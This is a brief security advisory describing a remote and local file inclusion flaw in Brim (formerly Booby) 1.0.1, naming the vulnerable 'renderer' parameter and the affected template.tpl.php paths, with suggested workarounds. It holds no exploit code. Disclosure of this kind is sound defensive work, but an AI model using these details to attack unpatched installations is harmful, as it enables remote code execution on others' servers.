Haihui

**Name of the Vulnerable Software and Affected Versions** Brim (formerly Booby) version 1.0.1 **Description** The issue allows remote attackers to execute arbitrary PHP code via a URL in the `renderer` parameter to `template.tpl.php` in various templates, including `barrel/`, `barry/`, `mylook/`, `oerdec/`, `penguin/`, `sidebar/`, `slashdot/`, and `text-only/`. This can also be used to include and execute arbitrary local files via directory traversal sequences. **Recommendations** For Brim (formerly Booby) version 1.0.1, consider restricting access to the `template.tpl.php` file in the affected templates to minimize the risk of exploitation. As a temporary workaround, avoid using the `renderer` parameter in the `template.tpl.php` file until a patch is available.